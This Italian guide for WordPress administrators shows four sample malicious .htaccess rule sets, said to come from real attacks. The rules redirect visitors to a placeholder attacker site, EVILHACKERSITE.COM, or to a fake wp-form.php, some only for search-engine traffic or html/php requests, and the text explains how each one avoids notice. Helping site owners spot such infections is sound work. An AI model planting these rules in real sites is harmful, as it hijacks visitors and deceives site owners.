Il codice sottostante è stato prelevato da un vero attacco hacker. Questo codice è stato trovato nel file .htaccess e reindirizza in automatico tutto il traffico del sito verso un altro sito.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://EVILHACKERSITE.COM [L,R]
</IfModule>
Questo codice è leggermente più sofisticato e reindirizza solo pagine html o xml. E’ più sofisticato perché spesso viene notato solo se si visita un file html del sito (e ciò accade raramente nei siti WordPress).
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ([^.]+\.(html|xml|))$ http://EVILHACKERSITE.COM [L,R]
</IfModule>
Questo codice verifica da dove proviene l’utente e, se arriva dai motori di ricerca, lo reindirizza:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://EVILHACKERSITE.COM/in.html?s=hg [R,L]
Errordocument 404 http://EVILHACKERSITE.COM/in.html?s=hg_err
Questo è un altro attacco hacker che prova ad unire i due precedenti identificando se l’utente proviene dai motori di ricerca o se sta accedendo ad un file con una specifica estensione (come detto, è un’azione che accade raramente in WordPress) e lo reindirizza.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|msn|aol|bing) [NC,OR]
RewriteCond %{HTTP_REFERER} (yahoo|google|aol|bing) [NC]
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|shtm|shtml|php|php3|php4|php5)$ [NC]
RewriteCond %{REQUEST_FILENAME} !wp-form\.php$
RewriteRule ^.*?$ /wp-form.php [L]
</IfModule>
Questo è un attacco hacker molto subdolo perché crea un file wp-form.php, che assomiglia ad un file WordPress ma in realtà non corrisponde a nessun file WordPress autentico.
In questo file sono inclusi una serie di controlli e redirects che reindirizzano l’utente verso un altro sito. Di solito questo attacco hacker è facilmente riconoscibile perché le pagine di wp-admin di solito finiscono con .php, quindi l’amministratore si accorge che è in atto un reindirizzamento, ad esempio visitando la pagina dei plugin: example.com/wp-admin/plugins.php.